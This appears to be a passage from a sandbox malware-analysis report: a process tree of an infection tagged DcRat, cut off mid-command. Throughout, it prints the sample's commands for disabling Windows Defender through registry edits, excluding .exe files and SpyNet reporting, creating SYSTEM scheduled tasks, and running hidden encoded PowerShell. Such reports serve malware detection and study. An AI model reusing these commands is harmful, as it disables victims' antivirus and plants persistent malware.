C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6064 -ip 6064
1⤵
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3680 -ip 3680
1⤵
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6832 -ip 6832
1⤵
PID:6244

C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
1⤵
PID:5924
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\StringIds.exe"
  2⤵
  PID:748

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 5848 -ip 5848
1⤵
PID:1064

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
1⤵
PID:6212
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE"
  2⤵
  PID:7084
- - C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
    C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE
    3⤵
    PID:6492

C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\PqkpRPi.exe
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\PqkpRPi.exe Ik /Kosite_idXNO 385118 /S
1⤵
PID:1628
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:7348
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7460
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:8000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7428
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 06:59:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ebuNsdF.exe\" dM /cPsite_idUZC 385118 /S" /V1 /F
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:7340
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "OvvioKEypuBLsTFYZ"
  2⤵
  PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5240 -ip 5240
1⤵
PID:3528

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
PID:1980
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\dllhost.exe"
  2⤵
  PID:4268

C:\Users\Admin\Pictures\UGHW1L~1.EXE
C:\Users\Admin\Pictures\UGHW1L~1.EXE
1⤵
PID:5888
- C:\Users\Admin\AppData\Local\Temp\7zS2ABA.tmp\Install.exe
  .\Install.exe
  2⤵
  PID:8172
- - C:\Users\Admin\AppData\Local\Temp\7zS905A.tmp\Install.exe
    .\Install.exe /klhTMdidYdHl "385118" /S
    3⤵
    PID:7792
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      PID:6680
    - - C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:7972
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:7120
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:4728
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:7824
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      PID:5004
    - - C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:6080
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:7728
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:7344
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:8044
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "giaHZhbQD" /SC once /ST 06:10:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:7988
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "giaHZhbQD"
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "giaHZhbQD"
      4⤵
      PID:8036
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 15:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\pncDELN.exe\" Ik /qKsite_idvWd 385118 /S" /V1 /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:4824

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:7564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 236 -ip 236
1⤵
PID:1724

C:\Users\Admin\AppData\Local\Temp\Files\i.exe
C:\Users\Admin\AppData\Local\Temp\Files\i.exe
1⤵
PID:7596

C:\ProgramData\common\JTPFKOXW.exe
C:\ProgramData\common\JTPFKOXW.exe
1⤵
PID:6244

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:6552
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\EXE~1"
  2⤵
  PID:7688

C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\tKpADNrKyKjYycp\oilfdto.exe
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\tKpADNrKyKjYycp\oilfdto.exe dM /Jpsite_idlYS 385118 /S
1⤵
PID:7504
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"
  2⤵
  PID:2192
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:5348
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:8168
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:1320
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\mIxfYz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7468 -ip 7468
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6760 -ip 6760
1⤵
PID:7412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:7456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1180 -ip 1180
1⤵
PID:7616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1412

C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\tAaOMuM.exe
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\tAaOMuM.exe dM /dCsite_idbno 385118 /S
1⤵
PID:5072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"
  2⤵
  PID:4196
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:6808
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:7924
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:4084
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:7476
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\LvVjFq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:400

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:7988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6096 -ip 6096
1⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\pncDELN.exe
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\pncDELN.exe Ik /qKsite_idvWd 385118 /S
1⤵
PID:5156
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 